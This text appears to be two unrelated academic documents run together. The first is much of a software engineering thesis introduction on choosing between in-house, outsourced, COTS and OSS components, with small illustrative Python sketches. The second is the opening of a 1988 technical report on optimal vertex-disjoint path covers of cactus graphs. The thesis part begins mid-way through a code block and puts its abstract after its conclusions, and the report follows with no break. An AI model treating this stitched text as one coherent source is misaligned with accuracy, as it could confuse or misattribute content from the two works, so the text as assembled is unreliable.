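for origin, p in sorted(posterior.items(), key=lambda kv: -kv[1]):
    print(f"{origin}: {p:.3f}")
```

With these invented numbers, the literature evidence shifts belief away from in-house development and towards OSS, illustrating how evidence from literature can be transferred into a practitioner's decision.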
2 BACKGROUND
This section provides background information of the concepts that are mentioned in the chapters.
Component-based software development: Component-based software development is defined as follows: "The primary role of component-based software engineering is to address the development of systems as an assembly of parts (components), the development of parts as reusable entities, and the maintenance and upgrading of systems by customizing and replacing such parts" [25]. The different parts (components) can be either developed in-house, outsourced or obtained as external components (COTS or OSS).
Component Origin: The different options for obtaining components are called component origins. Each development option is described as follows:
- **In-house**: This option is the most straightforward. It involves the development of the software component within the company. It also includes offshoring, where the software component is developed within the same company but in a different location.
- **Outsourcing**: The development of the software component is outsourced to another company, often called a supplier or vendor. The requirements for the development are provided by the company outsourcing the development.
- **OSS** [44, 65]: It refers to "open source software". OSS components are available for free, and each component is provided along with its source code. These components are pre-built, and the requirements for building them are derived from several factors, such as the developers' interest or sometimes even the market trend.
- **COTS** [11, 74]: It refers to "components off-the-shelf". Like OSS components, these components are pre-built; however, they are not free, and the source code is often not provided with them. COTS components are mainly driven by the market trend.
**Decision to choose component origin [113]:** In this thesis the decision-making is on the strategic level, i.e. choosing a component origin. Such decisions are often driven by some goal, such as improving the software development process or the return on investment. The decisions are based on criteria such as quality, time and cost. The decision-making process requires different models to estimate the criteria values, such as the cost to buy/build the component, or the time it takes to build, integrate and test the component. The decision-making process involves decision-makers from different roles; these roles might have different expertise in terms of background and responsibility, and make different contributions, such as decision initiator, supporter and decider.
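As a purely hypothetical illustration of how such criteria might be combined (this is a common weighted-sum scheme, not the decision-support method proposed in this thesis; all weights and scores are invented), a ranking over component origins could be sketched as:

```python
# Hypothetical weighted-sum illustration of trading off decision criteria
# (cost, time, quality) across component origins. Weights and scores are
# invented; a real decision-support system would estimate them with models.

criteria_weights = {"cost": 0.4, "time": 0.3, "quality": 0.3}

# Scores in [0, 1]: higher is better from the decision-maker's perspective.
scores = {
    "in-house":  {"cost": 0.3, "time": 0.2, "quality": 0.9},
    "outsource": {"cost": 0.5, "time": 0.5, "quality": 0.6},
    "COTS":      {"cost": 0.4, "time": 0.9, "quality": 0.7},
    "OSS":       {"cost": 0.9, "time": 0.8, "quality": 0.6},
}

def weighted_score(origin_scores, weights):
    """Combine per-criterion scores into one value via a weighted sum."""
    return sum(weights[c] * origin_scores[c] for c in weights)

ranking = sorted(scores,
                 key=lambda o: weighted_score(scores[o], criteria_weights),
                 reverse=True)
print(ranking)
```

Changing the weights (e.g. making quality dominant) changes the ranking, which mirrors the observation above that no component origin is universally best; the suitable origin depends on the context and the goal driving the decision.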
3 CONTRIBUTION AND RESEARCH GAPS
The contributions of this thesis are described in the sections below.
3.1 Chapter 2
One possible way to produce more, with high quality, in less time and at lower cost is to use agile methodologies [3]. Studies have reported a positive relationship between productivity and the use of agile methods [14]. One of the agile principles promotes continuous delivery of valuable software [3]. However, when the software has hardware dependencies, it is not always feasible to deliver working software frequently.
**Research gap 1:** No study has been conducted to better understand the challenges in in-house development for software-intensive systems. Hence, we conducted a case study to address the identified gap.
This leads us to the objective as follows:
Objective 1: To explore context, practices, challenges and impacts of software-intensive development projects.
3.2 Chapter 3
The context of software-intensive systems imposes limitations on software development improvements. However, utilizing alternative component origins such as external components might contribute to the improvement. For example, the pressure to develop faster due to market competitiveness is identified as a challenge in in-house development (Chapter 2). COTS and OSS are known to be viable options when time to market is a criterion [65]. Constant requirement changes might result in a lot of wasted development effort (Chapter 2), which can be minimized when the right external components are used, in particular OSS components, as no additional purchasing costs are involved [18, 65, 94]. Understanding complex requirements can be challenging and time-consuming (Chapter 2). Developers prefer to use pre-built components such as OSS libraries when task complexity is high, in order to improve productivity [104]. Using pre-built COTS and OSS components may improve productivity by reducing development effort [65]. Although using COTS is beneficial when time to market is critical, the time to test and integrate COTS components can be greater than the in-house development effort [40]. This indicates that one option is not always best for all possible scenarios. It is important to know how decisions are made and what criteria are used to select the component origins.
Research gap 2: Primary studies on the selection between component origins have been conducted; however, this evidence has not yet been aggregated and interpreted.
Hence, this leads us to our next objective, which is:
Objective 2: To identify factors that could influence the decision to choose among different component origins and solutions for decision-making in the literature.
3.3 Chapter 4
We used SB as the main search strategy to conduct the systematic literature review in Chapter 3.
**Research gap 3:** In software engineering there are fewer studies that use SB as compared to a DB search strategy for searching for primary studies. The potential of SB in terms of its efficiency and reliability in finding the primary studies is not fully understood.
Hence, this leads us to our next objective, which is:
**Objective 3:** To find efficient and reliable search strategies.
3.4 Chapter 5
After aggregating and interpreting evidence from the literature (Chapter 3), we had results on how the decisions for component selection were made. The next step is to make the evidence available to practitioners in a way that allows them to integrate the evidence from literature into their decisions.
**Research gap 4:** None of the synthesis methods in software engineering research is primarily designed to transfer evidence from literature into practice by taking the experience of practitioners into account.
Therefore, our next objective is:
**Objective 4:** To improve the methodological support for research problems that integrate evidence from literature and practitioners' knowledge.
3.5 Research questions
Research questions help us address the research objectives and gaps. The research questions in this thesis are formulated based on the objectives and the research gaps. Four main research questions are formulated, which are further divided into sub-research questions. The research questions addressed in the thesis and their mapping to the objectives and research gaps are shown in Figure 2. Note that the diagram shows the key research questions only; the further sub-questions are mentioned in the individual chapters.
The goals and chapters of the thesis are represented by the circles and blocks, respectively, in Figure 2. The blocks within each chapter represent the objective and research questions for that chapter, whereas the arrows within the blocks show the connection between the sub-research questions that answer the main research question and the objective. The arrows outside the blocks represent the connections between the chapters and goals; the connections are labelled accordingly.
The results from Chapters 2 and 3 address goal 1. In addition, Chapter 2 contributes to Chapter 3. The results from Chapter 2 were discussed along with the results of Chapter 3.
Goal 2 is formulated to support goal 1 and is addressed by Chapters 4 and 5. As mentioned earlier, the reflections on the methodology used in Chapter 3 are reported in Chapter 4. Chapter 5 contributes to Chapter 3 by providing methodological support to transfer the results from Chapter 3 to practitioners. Overall, goal 2 provides the methodological support required to address goal 1.
4 RESEARCH METHODOLOGY
Research methods help answer research questions in a systematic and repeatable way. The rigor of a research method not only allows a thorough investigation of a phenomenon but also allows readers to trust and rely on the results. The research methods used in this thesis are: systematic literature review and case study.
A brief summary of the research methods and their application to the chapters is provided in the following sections.
4.1 Case study (Chapter 2)
A case study is regarded as a suitable research method for software engineering research, as it is hard to study a phenomenon in isolation; a case study allows the phenomenon to be investigated in its real-life context. The steps involved in case study research are listed and summarized by Runeson and Höst [90] as follows:
1. Case study design: The objectives of the study are defined and the case study is planned based on the objective and research questions. The plan includes details about the case to be studied, the data collection method to be used, and the selection strategy to be used.
2. Preparation for data collection: The procedures and protocol for data collection are defined in this step. The protocol includes details such as which questions should be asked.
3. Collecting evidence: The data collection is performed to collect evidence.
4. Analysis of collected data: The collected data is analyzed using analysis methods that suit the collected data.
5. Reporting: The results of the analyzed data are reported. The report should include an elaborate description of the research work and details of the conclusions such as the context they affect.
A case study is used in Chapter 2 to identify the challenges in in-house development of software-intensive systems. Five software-intensive systems were investigated. Fourteen practitioners with different roles involved in the software development were interviewed. Semi-structured interviews were conducted using an open-ended questionnaire to collect the data. In addition, the company's standard process documents were reviewed and the first author participated in the project meetings, which allowed us to triangulate the collected data. The interviews were analyzed using grounded theory; we used its steps to structure and organize the interview data. Data collection and analysis were conducted in parallel: after each interview was conducted, it was transcribed and coded, and the follow-up questions for the next interview were identified on that basis.
4.2 Systematic literature review (Chapters 3 and 4)
Systematic literature reviews are used to aggregate and interpret the evidence through a scientific and repeatable process. It mainly includes the following steps:
1. Study identification. This step includes searching and selecting the primary studies. Mainly two search strategies are used in software engineering: DB search and SB. The primary studies are selected from the search results based on defined inclusion/exclusion criteria.
2. Data extraction. In this step the data from primary studies is extracted in an explicit and consistent way. Data extraction
forms are used to extract data. The design of the extraction forms is driven by the research questions.
3. Quality assessment. The quality of the primary studies is assessed in this step. The assessment is based on rigor and relevance of the primary studies.
4. Analysis. The data from the primary studies is analyzed in this step. Analysis methods such as thematic analysis or narrative analysis are commonly used for data from qualitative studies, whereas meta-analysis is commonly used for data from quantitative studies.
Chapter 3: In Chapter 3, a systematic literature review was conducted to identify factors that could influence the decision to choose among different component origins and solutions for decision-making in the literature. We used the SB search strategy following the guidelines in [111] to search for primary studies, and a DB search following the guidelines in [56] to validate and ensure the completeness of the search process. A data extraction form was used to extract data. The quality of the primary studies was evaluated using the rigor and relevance criteria defined in the guidelines proposed in [47]. Thematic analysis following the guidelines in [26] was used to analyze the results of the primary studies.
Chapter 4: In Chapter 4, reflections of conducting a systematic literature review using two different search strategies: SB and DB search are reported.
5 OVERVIEW OF THE CHAPTERS
In this section, an overview of the chapters is provided. The overview includes the objective of the chapter, the methods used to achieve the objective and a description of main findings.
5.1 Chapter 2: Perspectives on productivity and delays in large-scale agile projects
The software development process is constantly evolving; methods, processes and models supporting software development are used to improve it. Agile methodologies are one such example. However, agile methodologies are often implemented in project contexts that are not consistent with agile principles. The objective of this chapter is to explore the context, practices, challenges and impacts of software-intensive development projects.
An exploratory multi-case study was conducted to identify the challenges and impacts of developing software-intensive systems. Employee experiences were collected to identify areas of improvement in the software development practices. The research method used in this chapter is briefly described in Section 4, and a detailed description, along with the validity threats considered, is provided in Chapter 2.
The main findings of this chapter are the challenges that affected software development, the causes of those challenges and their impact on different roles. The identified challenges are related to requirements (creation, understandability, selection, estimation and stability), time-to-market, testing (completeness and infrastructure), collaboration (communication, decision-making, team dynamics and team stability), domain knowledge and the product repository. The challenges are caused by project complexity, product characteristics, distributed teams and domain knowledge limitations. They had an impact on planning, shared understanding, coordination, capacity and software quality assurance.
5.2 Chapter 3: Software component decision-making: in-house, OSS, COTS or outsourcing - A systematic literature review
Four widely used component origins are COTS, OSS, outsourcing and in-house development. Decision-makers choose a component origin for developing a component or components. The objective of this chapter is to present results from the literature on the factors that influence such decisions and the existing solutions supporting them.
A systematic literature review was conducted to identify primary studies. A total of twenty-four primary studies were identified. The details of the review protocol are reported briefly in Section 4.2 and in detail in Chapter 3.
Eleven factors that influence the decision to choose among different component origins were identified: time, cost, effort, market trend, source code availability, technical support, license, integration, requirements, maintenance and quality. Most of the primary studies considered two component origins in the decision; in-house vs. COTS and COTS vs. OSS were the most researched decisions. The solution models proposed in the literature are based on optimization techniques, and the criteria they consider are time, cost and reliability.
5.3 Chapter 4: Experiences from using snowballing and database searches in systematic literature studies
Systematic literature reviews are ways to aggregate and interpret findings from primary studies. DB search is commonly used for searching for primary studies in software engineering, and it is recommended to use SB after a DB search to find additional papers. There are few studies that use SB as the main or only method. The effort required in terms of the number of papers to be reviewed to find the primary papers (efficiency) and the capability to find all relevant papers (reliability) might raise some concerns. Therefore, the objective of this chapter is to find efficient and reliable search strategies. A brief summary of the results is provided below and the detailed description is reported in Chapter 4.
The main findings of this chapter are that DB search and SB are comparable. More papers were reviewed using SB than using DB search; however, most were duplicates, gray literature or non-English papers which were easy to exclude based on the title. In a DB search, such entries can be removed automatically by the search engines. The total numbers of abstracts reviewed using DB search and SB were approximately the same. The SB strategy identified 83% of the papers, the DB search identified 46%, and 29% of the papers were found by both. Hence, it can be concluded that the SB strategy was efficient and reliable for searching for the primary studies to achieve the objective of Chapter 3.
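The reported percentages are consistent with inclusion-exclusion over the study set. The following sketch is illustrative only: the counts (20 papers found by SB, 11 by DB, 7 by both, out of the 24 primary studies) are inferred from the percentages, not taken from the thesis.

```python
# Illustrative check (counts inferred, not from the thesis): with 24 primary
# studies, the reported percentages correspond to roughly 20 papers found by
# SB, 11 by DB, and 7 found by both strategies.
sb, db, both, total = 20, 11, 7, 24

# Inclusion-exclusion: every study is found by at least one strategy.
assert sb + db - both == total

print(round(100 * sb / total))    # ~83% found by SB
print(round(100 * db / total))    # ~46% found by DB
print(round(100 * both / total))  # ~29% found by both
```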
5.4 Chapter 5: Bayesian synthesis in software engineering: Method and illustration
Often the aim of software engineering is to identify or produce best practices, processes, tools and methods. It is important that the best practices are made available to practitioners. Evidence-based software engineering practice encourages integrating practitioner opinions with evidence from literature. This is done to use the evidence from literature and to adapt it to the practitioners’ context using the practitioners’ and/or researchers’ knowledge and experience. We propose the use of Bayesian synthesis to systematize the integration of evidence from literature and practitioners’ subjective opinion. This contributes towards decision-making, as most decisions are based on subjective opinions.
Bayesian synthesis can be summarized in three steps:
- Prior probability: Prior probability is formulated by collecting subjective opinions from practitioners and/or researchers.
- Likelihood: The likelihood is a summary of evidence from literature.
- Posterior probability: The posterior probability is obtained when the prior probability and the likelihood are combined.
The detailed process to conduct Bayesian synthesis is reported in Chapter 5 along with examples from software engineering research.
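The three steps above can be sketched with a conjugate Beta-Binomial update. This is an illustrative toy, not the procedure of Chapter 5; the function names, prior parameters and study counts below are invented for the example.

```python
def posterior_beta(prior_a, prior_b, successes, trials):
    """Conjugate update: Beta prior + Binomial evidence -> Beta posterior."""
    return prior_a + successes, prior_b + (trials - successes)

def beta_mean(a, b):
    return a / (a + b)

# Prior: suppose practitioners believe a practice helps in ~70% of cases,
# encoded (hypothetically) as Beta(7, 3).
prior_a, prior_b = 7, 3

# Likelihood: suppose 12 of 15 primary studies report a positive effect.
post_a, post_b = posterior_beta(prior_a, prior_b, successes=12, trials=15)

print(post_a, post_b)             # 19 6
print(beta_mean(post_a, post_b))  # 0.76 -- posterior belief after synthesis
```

The posterior mean (0.76) lies between the practitioners' prior (0.70) and the literature estimate (12/15 = 0.80), which is the qualitative behaviour Bayesian synthesis relies on.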
6 CONCLUSIONS AND FUTURE WORK
The overall goal of this thesis is to contribute to the improvement of the software development process to provide timely, high quality and cost efficient solutions. To address this goal we consider the use of different component origins. The methods used in this thesis are case study and systematic literature review. The case study research method is used to identify the challenges of developing software-intensive systems (Chapter 2). The criteria and solutions used to choose between different component origins are identified through a systematic literature review (Chapter 3), and the experiences of conducting the systematic literature review are reported in Chapter 4. A method to integrate the results from literature into practice is proposed in Chapter 5.
The results from Chapter 2 indicate that the context of software-intensive systems might hinder software development improvement. Some of the hindrances identified were regulations imposed by the domain. In Chapter 3 we investigated alternative component origins (COTS, OSS and outsourcing) to build software-intensive systems. The results indicate that the decision is not only between internal (in-house) and external component origins (COTS, OSS and outsourcing); the decision between external components (e.g. COTS vs. OSS) is also considered in the primary studies. However, it might be the case that the decision between internal and external was taken first, before the decision between the external components (e.g. COTS vs. OSS) was considered.
Figure 3: Thesis future work
It is important to note that the use of alternative component origins such as outsourcing, COTS and OSS is not a complete solution to all the challenges of in-house development; rather, some component origins are more beneficial than others in certain scenarios. A deeper investigation of the context or scenarios was not possible as the primary studies did not report sufficient details of the context. In addition, it was not possible to explore the perspectives of all the stakeholders involved in the decision; none of the primary studies focused on the perspective of the different stakeholders involved. To address these limitations a case study is planned to investigate the decision-making process in its real-life context (software-intensive systems). The results from the case study, along with the evidence from the literature, will be integrated using the Bayesian synthesis model proposed in Chapter 5. The future work based on this thesis is depicted in Figure 3, where the boxes with dotted lines represent future work.
Proposing a solution to support decision-making is also part of future work. The solution will focus on criteria and estimation models to estimate outcomes of the criteria.
ABSTRACT
Context: The amount of software in solutions provided in various domains is continuously growing. These solutions are a mix of hardware and software solutions, often referred to as software-intensive systems. Companies seek to improve the software development process to avoid delays or cost overruns related to the software development.
Objective: The overall goal of this thesis is to improve the software development process to provide timely, high quality and cost efficient solutions. The objective is to select the origin of the components (in-house, outsourcing, commercial off-the-shelf (COTS) or open source software (OSS)) that facilitates the improvement. The system can be built from components of one origin or a combination of two or more (or even all) origins. Selecting a proper origin for a component is important to get the most out of it and to optimize the development.
Method: It is necessary to investigate the component origins in order to decide among them. We conducted a case study to explore the existing challenges in software development. The next step was to identify factors that influence the choice among different component origins through a systematic literature review using a snowballing (SB) strategy and a database (DB) search. Furthermore, a Bayesian synthesis process is proposed to integrate the evidence from literature into practice.
Results: The results of this thesis indicate that the context of software-intensive systems, such as domain regulations, can hinder software development improvement. In addition to in-house development, alternative component origins (outsourcing, COTS, and OSS) are being used for software development. Several factors such as time, cost and license implications influence the selection of component origins. Solutions have been proposed to support the decision-making; however, these solutions consider only a subset of the factors identified in the literature.
Conclusions: Each component origin has some advantages and disadvantages. Depending on the scenario, one component origin is more suitable than the others. It is important to investigate the different scenarios and suitability of the component origins, which is recognized as future work of this thesis. In addition, the future work is aimed at providing models to support the decision-making process.
Keywords: Component-based software development, component origin, decision-making, snowballing, database search, Bayesian synthesis.
OPTIMAL COVERING OF CACTI
BY VERTEX-DISJOINT PATHS
by
Shlomo Moran and Yaron Wolfstahl
Technical Report #501
March 1988
Abstract
A path cover (abbr. cover) of a graph $G$ is a set of vertex-disjoint paths which cover all the vertices of $G$. An optimal cover of $G$ is a cover of the minimum possible cardinality. The optimal covering problem is known to be NP-complete even for cubic 3-connected planar graphs where no face has fewer than 5 edges. Motivated by the intractability of this problem, we develop an efficient optimal covering algorithm for cacti (i.e. graphs where no edge lies on more than one cycle). In doing so we generalize the results of [2] and [9], where optimal covering algorithms for trees and graphs where no two cycles share a vertex were presented.
1. Introduction
Let $G=(V_G, E_G)$ be an undirected graph with no self loops or parallel edges. A path in $G$ is either a single vertex $v \in V_G$ or a sequence of distinct vertices $(v_1, v_2, \ldots, v_k)$ where for $1 \leq i \leq k-1$, $(v_i, v_{i+1}) \in E_G$. A path cover (abbr. cover) of $G$ is a set of vertex-disjoint paths which cover all the vertices of $G$. An optimal cover of $G$ is a cover of the minimum possible cardinality. The cardinality of such a cover is called the covering number of $G$, and is denoted by $\pi(G)$.
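The definitions above can be made concrete with a small checker. This is a sketch with hypothetical names (`is_path_cover` is ours, not from the paper): it verifies that a set of paths is vertex-disjoint, uses only edges of $G$, and covers every vertex of $G$; $\pi(G)$ is then the size of the smallest set passing this check.

```python
def is_path_cover(vertices, edges, paths):
    """Check the definition: vertex-disjoint paths of G covering all of V_G."""
    edge_set = {frozenset(e) for e in edges}
    seen = set()
    for p in paths:
        if len(set(p)) != len(p):  # vertices within a path must be distinct
            return False
        # consecutive vertices must be joined by an edge of G
        if any(frozenset((u, v)) not in edge_set for u, v in zip(p, p[1:])):
            return False
        if seen & set(p):          # paths must be pairwise vertex-disjoint
            return False
        seen |= set(p)
    return seen == set(vertices)   # every vertex must be covered

# The star K_{1,3} cannot be covered by a single path, so pi = 2 here.
V = [1, 2, 3, 4]
E = [(1, 2), (1, 3), (1, 4)]
print(is_path_cover(V, E, [(2, 1, 3), (4,)]))  # True: a cover of size 2
print(is_path_cover(V, E, [(2, 1, 3, 4)]))     # False: (3, 4) is not an edge
```

Note that a single vertex counts as a path, matching the definition above.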
The concept of graph covering has many practical applications. For example, in order to establish ring protocols [10], a computer network may be augmented by some auxiliary edges so as to make it Hamiltonian [5]. It is easily verified that the minimum number of additional edges needed to make a network Hamiltonian is identical to the covering number of the network. Other notable applications of graph covering are code optimization [3] and mapping parallel programs to parallel architectures [9].
The problem of finding an optimal cover is NP-complete even for cubic 3-connected planar graphs where no face has fewer than 5 edges [6]. There are, however, several results on optimal covering of restricted classes of graphs. Boesch, Chen and McHugh have derived in [2], among other things, an optimal covering algorithm for trees. Their result was generalized by Pinter and Wolfstahl [9], who developed an efficient optimal covering algorithm for graphs where no two cycles share a vertex. Boesch and Gimpel [3] have considered the related problem of covering a directed acyclic graph by directed paths.
The main result presented in this paper generalizes the above results of [2] and [9]. Specifically, we develop a linear optimal covering algorithm for cacti, that is, graphs where no edge lies on more than one cycle [1,8,11] (see Figure 1). We note that the class of cacti properly contains the graph classes considered in [2] and [9]. The algorithm basically operates by applying two types of rules, namely, edge-deletion rules and a recursive decomposition rule. The edge-deletion rules characterize the edges that can be deleted from a given cactus without affecting its covering number. The recursive decomposition rule provides a tool for constructing an optimal cover of a cactus by decomposing it into two components and covering each component separately. We believe that the combined use of the two types of rules is a feature of independent interest.
The rest of this paper is organized as follows. The edge-deletion rules are presented in Section 2. The recursive decomposition rule is presented in Section 3. The algorithm, developed in Section 4, specifies the order by which those rules are to be applied.
2. Edge-Deletion Rules
The edge-deletion rules are presented in the lemmas below. First, we need some definitions.
Definition 1: Let $S_0$ be a cover of a graph $G=(V_G, E_G)$. We say that $S_0$ employs an edge $e \in E_G$ if some path in $S_0$ includes $e$. A trail starting at $v_1 \in V_G$ is a path $(v_1, v_2, \ldots, v_k)$ containing two or more vertices, where $deg(v_i)=2$ for $1<i<k$ and $deg(v_k)=1$. If exactly one trail starts at $v_1$ then this trail is denoted by $tr(v_1)$. A vertex $v \in V_G$ is a fork if $deg(v)\geq 3$ and at least two trails start at $v$. A vertex $v_1 \in V_G$ is a semi-fork if $deg(v_1)\geq 3$, exactly one trail $(v_1, v_2, \ldots)$ starts at $v_1$, and $v_1$ is adjacent to a vertex $w$ ($w \neq v_2$) where $deg(w)=2$. A trimmed cactus is a cactus containing no forks.
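Trail and fork detection under Definition 1 can be sketched as follows (the function names are ours, not the paper's): starting from each neighbour of $v$, follow the chain of degree-2 vertices; the chain is a trail exactly when it ends at a degree-1 vertex.

```python
from collections import defaultdict

def adjacency(edges):
    """Adjacency sets of an undirected graph given as an edge list."""
    adj = defaultdict(set)
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    return adj

def trails_from(v, adj):
    """Trails starting at v: chains of degree-2 vertices ending at a leaf."""
    trails = []
    for w in adj[v]:
        path, prev, cur = [v], v, w
        while len(adj[cur]) == 2 and cur != v:  # walk through interior vertices
            path.append(cur)
            prev, cur = cur, next(x for x in adj[cur] if x != prev)
        if len(adj[cur]) == 1:                  # a trail must end at degree 1
            trails.append(tuple(path + [cur]))
    return trails

def is_fork(v, adj):
    # A fork has degree >= 3 and at least two trails starting at it.
    return len(adj[v]) >= 3 and len(trails_from(v, adj)) >= 2

# Vertex 1 has degree 3 and three trails (to leaves 2, 4 and 6): a fork.
adj = adjacency([(1, 2), (1, 3), (3, 4), (1, 5), (5, 6)])
print(is_fork(1, adj))  # True
```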
The following proposition is often used in the sequel.
Proposition 1: Let $S$ be a cover of a graph $G=(V_G, E_G)$. Let $u, v$ and $w$ be vertices in $V_G$ where
1. $\{(u,v),(u,w)\} \subseteq E_G$,
2. $(u,w)$ is employed by $S$ but $(u,v)$ is not, and
3. $v$ is an end-vertex of some path in $S$.
Then there exists a cover of $G$, denoted by $\bar{S}$, that employs $(u,v)$ but not $(u,w)$ and satisfies $|\bar{S}| \leq |S|$.
Proof: Straightforward.
Lemma 1 below is easily proved using the above proposition. This lemma can be used to convert a given cactus into union of trimmed cacti.
Lemma 1 [9] (Deletions due to forks and semi-forks): Let $G=(V_G, E_G)$ be a cactus. Let $v_1 \in V_G$ be a vertex of degree 3 or more which is the start-point of a trail $(v_1, v_2, \ldots, v_k)$ and is adjacent to a vertex $w \neq v_2$ of degree 1 or 2. Then $G'=(V_G, E'_G)$, where $E'_G=E_G-\{(x,v_1) \mid (x,v_1) \in E_G, x \notin \{v_2,w\}\}$, satisfies $\pi(G)=\pi(G')$. \(\square\)
Next, we define the concept of end-cycle which plays a key role in the development of our covering algorithm. In fact, the rest of the edge-deletion rules, as well as the recursive decomposition rule, are applicable to end-cycles. The formal definition of end-cycle is preceded by some necessary additional definitions.
Definition 2: Let $G=(V_G, E_G)$ be a connected graph. Let $A=(V_A, E_A)$ and $B=(V_B, E_B)$ be edge-disjoint connected subgraphs of $G$. A vertex $u \in V_G$ separates $A$ from $B$ if for all $v \in V_A$ and $w \in V_B$, all the paths connecting $v$ and $w$ contain $u$. If $u \in V_A$ and $u$ separates $A$ from the subgraph induced by $V_G-V_A$, we say that $u$ separates $A$ from $G$. In this case, we also say that $u$ is a separating vertex. The set of connected components separated from $G$ by a vertex $u$ is denoted by $CC(u)$.
A crown is a connected graph containing a single cycle which satisfies
1. At least one vertex on the cycle is of degree 2.
2. Each vertex \( u \) on the cycle is either of degree 2 or of degree 3. In the latter case, \( u \) is the start-point of a trail.
Given a crown \( C \), the unique cycle in \( C \) is denoted by \( C^0 \), and the degree of each vertex \( v \) in \( C \) is denoted by \( \text{deg}_c(v) \).
Let \( C \) be a crown that is a proper subgraph of a cactus \( G \). We say that \( C \) is an end-cycle of \( G \) (denoted \( C \sim G \)) if the following hold:
1. There exists a vertex \( u \) on \( C^0 \) such that \( \text{deg}_c(u)=2 \) and \( u \) separates \( C \) from \( G \). This vertex is called the anchor of \( C \).
2. If \( u \) belongs to no cycle other than \( C^0 \), then there is a vertex \( v \) not on \( C \), such that \( v \) separates \( C \) from all cycles in \( G \) (see crown \( C_1 \) in Figure 2).
3. If \( u \) belongs to cycles other than \( C^0 \), then all the connected components in \( CC(u) \), except perhaps one, contain at most one cycle (see crown \( C_2 \) in Figure 2).
Let \( C \) be an end-cycle of \( G \). If each vertex \( v \) on \( C^0 \) satisfies \( \text{deg}_c(v)=2 \), then \( C \) is an end-cycle of order 2. If each vertex \( v \) on \( C^0 \) (except for the anchor) satisfies \( \text{deg}_c(v)=3 \), then \( C \) is an end-cycle of order 3. For example, crown \( C_1 \) in Figure 2 is an end-cycle of order 2, while crown \( C_2 \) is an end-cycle of order 3.
(Insert Figure 2 here)
Next, we prove that an end-cycle must exist in any trimmed cactus that properly contains a cycle.
Definition 3: If \( G=(V, E) \) has a separating vertex then it is called separable, and it is called nonseparable otherwise.
Let \( V' \subseteq V \). The subgraph induced by \( V' \) is called a nonseparable component of \( G \) if it is nonseparable and if for every larger set \( V'' \), \( V' \subset V'' \subseteq V \), the subgraph induced by \( V'' \) is separable. Let \( N = \{n_1, n_2, \ldots, n_k\} \) be the set of the nonseparable components of \( G \), and let \( S = \{s_1, s_2, \ldots, s_p\} \) be the set of its separating vertices. The superstructure of \( G \) is the tree \( T=(V_T, E_T) \), where \( V_T=N \cup S \) and \( E_T=\{(s_i, n_j) \mid s_i \text{ is a vertex of } n_j \} \) [4]. For each \( v \in V_T \), let \( g(v) \) denote the nonseparable component or the separating vertex in \( G \) which corresponds to \( v \).
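The separating vertices and nonseparable components used in this construction are, in modern terminology, the articulation points and biconnected components of \( G \). As an illustration only (not part of the paper), the separating vertices can be found with the standard lowpoint computation; a minimal Python sketch over an adjacency-dict representation:

```python
def articulation_points(adj):
    """Return the set of separating (articulation) vertices of the
    undirected graph adj: vertex -> set of neighbours."""
    disc, low, aps = {}, {}, set()
    timer = [0]

    def dfs(u, parent):
        disc[u] = low[u] = timer[0]
        timer[0] += 1
        children = 0
        for v in adj[u]:
            if v == parent:
                continue
            if v in disc:                      # back-edge
                low[u] = min(low[u], disc[v])
            else:                              # tree-edge
                children += 1
                dfs(v, u)
                low[u] = min(low[u], low[v])
                if parent is not None and low[v] >= disc[u]:
                    aps.add(u)                 # u separates v's subtree from G
        if parent is None and children > 1:
            aps.add(u)                         # root with >= 2 DFS subtrees

    for s in adj:
        if s not in disc:
            dfs(s, None)
    return aps
```

For example, on the cactus consisting of a triangle \( \{1,2,3\} \) with a pendant edge \( (3,4) \), the only separating vertex is 3.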
Lemma 2 (Existence of end-cycles): If a trimmed cactus, \( G=(V, E) \), properly contains a cycle, then \( G \) contains an end-cycle.
Proof: Denote the set of the nonseparable components of \( G \) by \( N \). By definition of cacti, \( N=C \cup X \) where \( C \) is a set of cycles and \( X \) is a set of edges not on cycles. Let \( T=(N \cup S, E_T) \) be the superstructure of \( G \). Choose a vertex \( s_1 \in S \) to be the root of \( T \) (see Figure 3). For any other vertex \( v \), let \( f(v) \) denote the neighbor of \( v \) which is on the unique path between \( s_1 \) and \( v \). If \( u=f(v) \) then \( v \) is said to be a son of \( u \). The transitive closure of the son relation is the descendant relation. For each vertex \( v \) of \( T \), let \( A(v) \) denote the set of the neighbors of \( v \), that is, \( A(v) = \{u \mid (u,v) \in E_T \} \). Let \( c \in C \) be a vertex
whose distance from \( s_1 \) is maximal over all vertices of \( C \), and let \( s = f(c) \) (observe that \( s \in S \)). Let \( G' \) be the connected component in \( G \) induced by \( c \) and its descendants in \( T \). It is next shown that \( G' \) is an end-cycle in \( G \).
(Insert Figure 3 here)
1. By the choice of \( c \) and the fact that \( G \) is trimmed, \( G' \) is a crown. Moreover, \( g(s) \) separates \( G' \) from \( G \).
2. If \( (A(s) \cap C) = \{c\} \) then \( f(s) \in X \), so \( g(f(s)) \in E_G \). Let \( g(f(s)) = (v_1, v_2) \) where \( v_1 = g(s) \). Observe that \( v_2 \) separates \( G' \) from all other cycles in \( G \), for otherwise there would be a vertex \( c' \in C \), a descendant of \( s \), whose distance from the root is bigger than that of \( c \). Hence, \( G' \) is an end-cycle in \( G \).
3. Assume that \( A(s) \) contains a vertex of \( C \) other than \( c \). By the choice of \( c \), no descendant of \( s \) is a vertex of \( C \), unless it belongs to \( A(s) \). Thus, no component in \( CC(g(s)) \), except perhaps for the one corresponding to \( g(f(s)) \), contains more than one cycle. We conclude that \( G' \) is an end-cycle. \( \Box \)
Lemma 1 can be used to convert a cactus into a trimmed cactus with no semi-forks, where all end-cycles are either of order 2 or of order 3. The rest of the edge-deletion rules are concerned with such end-cycles. The following lemma is proved using Proposition 1.
**Lemma 3** [9] (Deletions due to end-cycles of order 2 or isolated cycles): Let \( G = (V_G, E_G) \) be a cactus. Let \( C \) be a subgraph of \( G \) which is either an isolated cycle or an end-cycle of order 2. Let \( v_1, v_2, ..., v_k \) be the vertices on \( C^o \) (starting from the anchor, if such exists). Then \( G' = (V_G, E'_G) \) where \( E'_G = E_G - \{(v_1, v_2)\} \) satisfies \( \pi(G') = \pi(G) \). \( \Box \)
Suppose that neither Lemma 1 nor Lemma 3 is applicable to a cactus \( G \). Then each end-cycle in \( G \) is of order 3. The following lemmas are concerned with such end-cycles.
